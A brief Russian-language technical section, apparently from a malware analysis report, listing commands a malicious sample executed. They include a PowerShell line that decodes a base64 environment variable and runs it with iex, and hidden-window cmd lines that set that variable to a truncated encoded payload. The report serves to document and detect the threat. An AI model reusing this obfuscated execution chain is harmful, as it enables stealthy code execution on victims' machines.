Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop $x=[System.Convert]::FromBase64String($env:gg);$x=[System.Text.Encoding]::Unicode.GetString($x);iex $x
- '<SYSTEM32>\cmd.exe' /c set gg=UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA4ADQAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGE...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c set gg=UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA4ADQAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGE...